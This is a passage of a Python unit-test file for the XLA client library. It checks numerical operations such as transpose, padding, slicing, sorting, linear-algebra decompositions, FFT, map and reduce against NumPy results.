[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(c, 0,
xla_client.shape_from_pyval(np.array(0, dtype=in_dtype)))
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
